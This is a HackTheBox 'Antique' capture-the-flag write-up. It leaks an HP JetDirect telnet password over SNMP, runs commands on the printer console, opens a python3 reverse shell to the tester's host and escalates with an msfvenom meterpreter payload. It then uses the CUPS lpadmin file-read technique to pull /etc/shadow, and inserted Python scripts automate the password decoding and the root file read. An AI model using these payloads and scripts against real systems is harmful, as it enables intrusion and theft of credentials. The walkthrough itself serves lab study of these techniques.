【HTB】Antique (SNMP information leak, lpadmin group)

Author: 天线锅仔 | Published 2021-12-01 01:22

    Disclaimer

    The host attacked in this post was tested with proper authorisation. The tools and methods described are for study and exchange only; do not use the tools or the approach shown here for any illegal purpose. The author accepts no responsibility for any consequences of doing so, nor for any misuse or damage that results.

    Service detection

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nmap -sV -Pn 10.10.11.107
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
    Nmap scan report for 10.10.11.107
    Host is up (0.39s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    23/tcp open  telnet?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
    SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
    SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
    SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
    SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
    SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
    SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
    SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
    SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
    SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
    SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
    SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
    SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
    SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
    SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
    SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
    SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
    SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
    SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
    SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
    SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
    SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
    SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
    SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
    SF:Direct\n\nPassword:\x20");
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds
    
    

    Port 23 is running a telnet service, so connect to it with nc and take a look.

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nc 10.10.11.107 23

    HP JetDirect

    ls
    Password: 123456
    Invalid password
    
    

    The banner reads HP JetDirect; a quick search shows that is HP's network print server.

    Telnet asks for a password but not for a username.

    Searching Google for "HP JetDirect telnet" turned up this article.

    Following the method from "Getting a JetDirect password remotely using the SNMP vulnerability", we query the password OID over SNMP. Note that SNMP runs on UDP/161, which the TCP-only `-sV` scan above never touched; a separate `nmap -sU -p 161` is what would have shown it. The request below assumes the default read-only community string `public`.

    ┌──(root💀kali)-[~/htb/Antique]
    └─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
    Created directory: /var/lib/snmp/cert_indexes
    iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
    
    

    Paste the hex bytes into the hex2text site and the password comes out as P@ssw0rd@123!!123. Only the first 17 pairs (50 40 73 ... 33) are the password; the decimal numbers after them are net-snmp's rendering of a BITS value (the positions of the set bits in those same bytes) and must be dropped before decoding.
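    The decoding done in Python, as an added example that is not from the original post or from the JetDirect article it cites. Instead of guessing where the hex bytes end, it finds the prefix of hex pairs that reproduces the trailing set-bit list, so the bit indices can never be mistaken for password bytes. The sample line is the snmpget output quoted above, rejoined from its two terminal lines; the Hex-STRING branch is an assumption about how other net-snmp builds may print the same OID.

```python
"""Decode net-snmp's BITS rendering of the JetDirect password OID (added example).

Assumption: snmpget printed the value as 'BITS: <hex pairs> <set-bit positions>'
(or, on other builds, as 'Hex-STRING: <hex pairs>'). The hex pairs carry the
password; the bit positions are derived from those same bytes, so the correct
split is the hex prefix whose set bits equal the remainder of the line.
"""
import re

JETDIRECT_PASSWORD_OID = ".1.3.6.1.4.1.11.2.3.9.1.1.13.0"

# Constructed from the snmpget output above (the terminal had wrapped it over two lines).
SNMPGET_LINE = (
    "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 "
    "33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 "
    "74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135"
)

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


def set_bits(data: bytes) -> list:
    """Positions of the 1 bits, numbered MSB-first from 0 as SNMP BITS does."""
    return [i * 8 + b for i, byte in enumerate(data) for b in range(8) if (byte >> (7 - b)) & 1]


def decode_snmp_octets(line: str) -> bytes:
    """Recover the raw bytes from a 'BITS:' or 'Hex-STRING:' value line."""
    m = re.search(r"=\s*(BITS|Hex-STRING):\s*(.*)$", line)
    if not m:
        raise ValueError("not a BITS/Hex-STRING value line")
    kind, tokens = m.group(1), m.group(2).split()
    if kind == "Hex-STRING":
        return bytes.fromhex("".join(tokens))
    # BITS: try the longest all-hex-pair prefix first; the remainder must equal
    # the set-bit list derived from that prefix, otherwise shrink the prefix.
    for k in range(len(tokens), 0, -1):
        head, tail = tokens[:k], tokens[k:]
        if not all(HEX_PAIR.fullmatch(t) for t in head):
            continue
        data = bytes.fromhex("".join(head))
        if [str(b) for b in set_bits(data)] == tail:
            return data
    raise ValueError("no hex prefix reproduces the trailing bit list")


def jetdirect_password(line: str) -> str:
    """The JetDirect telnet password is plain ASCII stored in the OID's octets."""
    return decode_snmp_octets(line).decode("ascii")


if __name__ == "__main__":
    print(jetdirect_password(SNMPGET_LINE))
```

    A practical check: a valid split exists only if the bit list is consistent with the bytes, so a mangled copy-paste (a dropped token, a wrapped line glued wrongly) raises instead of silently yielding a wrong password.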

    Log in to telnet with the recovered password:

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nc 10.10.11.107 23
    
    HP JetDirect
    
    
    Password: P@ssw0rd@123!!123
    
    Please type "?" for HELP
    > ?
    
    To Change/Configure Parameters Enter:
    Parameter-name: value <Carriage Return>
    
    Parameter-name Type of value
    ip: IP-address in dotted notation
    subnet-mask: address in dotted notation (enter 0 for default)
    default-gw: address in dotted notation (enter 0 for default)
    syslog-svr: address in dotted notation (enter 0 for default)
    idle-timeout: seconds in integers
    set-cmnty-name: alpha-numeric string (32 chars max)
    host-name: alpha-numeric string (upper case only, 32 chars max)
    dhcp-config: 0 to disable, 1 to enable
    allow: <ip> [mask] (0 to clear, list to display, 10 max)
    
    addrawport: <TCP port num> (<TCP port num> 3000-9000)
    deleterawport: <TCP port num>
    listrawport: (No parameter required)
    
    exec: execute system commands (exec id)
    exit: quit from telnet session
    > exec id
    uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
    > exec whoami
    lp
    /var/spool/lpd
    > exec find / -name user.txt
    /home/lp/user.txt
    /var/spool/lpd/user.txt
    
    

    Privilege escalation

    Check the system details:

    > exec uname -a
    Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    > exec python3 --version
    Python 3.8.10
    
    

    python3 is installed, so use the command below to get a more usable reverse shell:

    exec python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nc -lnvp 4242
    listening on [any] 4242 ...
    connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
    $ id
    id
    uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
    $
    
    

    The lpadmin group stands out as a possible escalation path. A Google search led to this article, which says:

    members of lpadmin can read every file on server via cups

    Members of the group may change cupsd settings with cupsctl. On the CUPS 1.6.1 running here that includes ErrorLog, so pointing it at an arbitrary file and then requesting /admin/log/error_log from the CUPS web interface on port 631 returns that file, opened by cupsd as root. Searching for an escalation script turned up the Metasploit module multi/escalate/cups_root_file_read, which automates exactly this and restores ErrorLog afterwards in its "Cleaning up" step.
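    The same file read done by hand from the lp shell, as an added example that is neither the post's own code nor the Metasploit module. It assumes cupsd answers on localhost:631 and that the Ubuntu default error log is /var/log/cups/error_log (both labelled in the code). It also recognises the CUPS "Not Found" page that comes back when the requested path does not exist, which is what the module later stores as if it were /root/.ssh/id_rsa.

```python
"""Read a root-only file through cupsd's ErrorLog setting (added example).

Technique, as in multi/escalate/cups_root_file_read: a member of lpadmin runs
`cupsctl ErrorLog=<path>`, cupsd (root) now serves that path as its error log
at http://localhost:631/admin/log/error_log, then ErrorLog is restored.
"""
import http.client
import subprocess

CUPS_HOST = "localhost"          # assumed: cupsd listening on the loopback address
CUPS_PORT = 631
DEFAULT_ERROR_LOG = "/var/log/cups/error_log"   # assumed Ubuntu default
LOG_PATH = "/admin/log/error_log"

# Constructed from the 404 page CUPS 1.6.1 returned for the missing id_rsa.
CUPS_NOT_FOUND_HTML = (
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" '
    '"http://www.w3.org/TR/html4/loose.dtd">\n<HTML>\n<HEAD>\n'
    '\t<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">\n'
    "\t<TITLE>Not Found - CUPS v1.6.1</TITLE>\n"
    '\t<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">\n'
    "</HEAD>\n<BODY>\n<H1>Not Found</H1>\n<P></P>\n</BODY>\n</HTML>\n"
)


def cupsctl_args(path: str) -> list:
    """Command that repoints cupsd's error log; needs lpadmin membership."""
    return ["cupsctl", "ErrorLog=" + path]


def is_cups_not_found(status: int, body: bytes) -> bool:
    """cupsd answers with its HTML 404 page when ErrorLog points at a path it
    cannot open; treat that as 'no such file', never as file content."""
    return status == 404 or b"<TITLE>Not Found - CUPS" in body


def fetch_error_log(host: str = CUPS_HOST, port: int = CUPS_PORT):
    """GET whatever cupsd currently believes is its error log."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("GET", LOG_PATH)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def read_file_via_cups(path: str) -> bytes:
    """Return the bytes of `path` as read by root, or raise if cupsd cannot open it."""
    subprocess.run(cupsctl_args(path), check=True)
    try:
        status, body = fetch_error_log()
    finally:
        # Always put the real log back, as the msf module's "Cleaning up" step does;
        # anything cupsd logs while the setting is in place lands in the target file.
        subprocess.run(cupsctl_args(DEFAULT_ERROR_LOG), check=False)
    if is_cups_not_found(status, body):
        raise FileNotFoundError("cupsd could not serve " + path)
    return body


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/shadow"
    sys.stdout.buffer.write(read_file_via_cups(target))
```

    Run it from the reverse shell as `python3 cups_read.py /etc/shadow`. It only works on CUPS this old: later releases moved ErrorLog and the other file-path directives into cups-files.conf, which cupsctl cannot modify, so the same `cupsctl` call is rejected there.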

    First build an msf reverse-shell payload:

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf

    Upload it to the target, run it to get a meterpreter session, then run the escalation module:

    msf6 exploit(multi/handler) > run
    
    [*] Started reverse TCP handler on 10.10.14.15:4444 
    [*] Sending stage (980808 bytes) to 10.10.11.107
    [*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500
    
    meterpreter > run multi/escalate/cups_root_file_read
    
    [!] SESSION may not be compatible with this module.
    [+] User in lpadmin group, continuing...
    [+] cupsctl binary found in $PATH
    [+] nc binary found in $PATH
    [*] Found CUPS 1.6.1
    [+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
    [*] Cleaning up...
    meterpreter > getuid
    
    

    View the /etc/shadow file:

    ┌──(root💀kali)-[~/htb/Antique]
    └─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
    root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
    daemon:*:18375:0:99999:7:::
    bin:*:18375:0:99999:7:::
    sys:*:18375:0:99999:7:::
    sync:*:18375:0:99999:7:::
    games:*:18375:0:99999:7:::
    man:*:18375:0:99999:7:::
    lp:*:18375:0:99999:7:::
    mail:*:18375:0:99999:7:::
    news:*:18375:0:99999:7:::
    uucp:*:18375:0:99999:7:::
    proxy:*:18375:0:99999:7:::
    www-data:*:18375:0:99999:7:::
    backup:*:18375:0:99999:7:::
    list:*:18375:0:99999:7:::
    irc:*:18375:0:99999:7:::
    gnats:*:18375:0:99999:7:::
    nobody:*:18375:0:99999:7:::
    systemd-network:*:18375:0:99999:7:::
    systemd-resolve:*:18375:0:99999:7:::
    systemd-timesync:*:18375:0:99999:7:::
    messagebus:*:18375:0:99999:7:::
    syslog:*:18375:0:99999:7:::
    _apt:*:18375:0:99999:7:::
    tss:*:18375:0:99999:7:::
    uuidd:*:18375:0:99999:7:::
    tcpdump:*:18375:0:99999:7:::
    landscape:*:18375:0:99999:7:::
    pollinate:*:18375:0:99999:7:::
    systemd-coredump:!!:18389::::::
    lxd:!:18389::::::
    usbmux:*:18891:0:99999:7:::  
    

    Put it into a format john can read. passwd.txt holds the matching root line from /etc/passwd, which is world-readable on the target and can be fetched with a plain `exec cat /etc/passwd` from the telnet session:

    ┌──(root💀kali)-[~/htb/Antique]
    └─# cat shadow.txt
    root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::

    ┌──(root💀kali)-[~/htb/Antique]
    └─# unshadow passwd.txt shadow.txt > unshadowed.txt

    ┌──(root💀kali)-[~/htb/Antique]
    └─# cat unshadowed.txt
    root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash
    
    

    But I was not able to crack this password.

    So, a change of approach: is there an id_rsa under /root? Edit the msf module:

    msf6 > use multi/escalate/cups_root_file_read
    msf6 post(multi/escalate/cups_root_file_read) > edit
    
    

    Change line 46 of the module to /root/.ssh/id_rsa.

    Save the edit.

    Download it locally:

    meterpreter > run multi/escalate/cups_root_file_read
    
    [!] SESSION may not be compatible with this module.
    [+] User in lpadmin group, continuing...
    [+] cupsctl binary found in $PATH
    [+] nc binary found in $PATH
    [*] Found CUPS 1.6.1
    [+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
    [*] Cleaning up...
    
    

    However, there is no such file. The 341 bytes msf reported as saved are not a key but CUPS's own "Not Found" page, returned because cupsd could not open the path it had been given as ErrorLog. Check the loot file for this HTML before trusting a "saved" message:

    ┌──(root💀kali)-[~]
    └─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <HTML>
    <HEAD>
            <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
            <TITLE>Not Found - CUPS v1.6.1</TITLE>
            <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
    </HEAD>
    <BODY>
    <H1>Not Found</H1>
    <P></P>
    </BODY>
    </HTML>   
    

    In the end I just pulled /root/root.txt down locally; by the time I finished it was past one in the morning, which wraps up this box.

    meterpreter > run multi/escalate/cups_root_file_read
    
    [!] SESSION may not be compatible with this module.
    [+] User in lpadmin group, continuing...
    [+] cupsctl binary found in $PATH
    [+] nc binary found in $PATH
    [*] Found CUPS 1.6.1
    [+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
    [*] Cleaning up...
    
    

    Original link: https://www.haomeiwen.com/subject/vfgjxrtx.html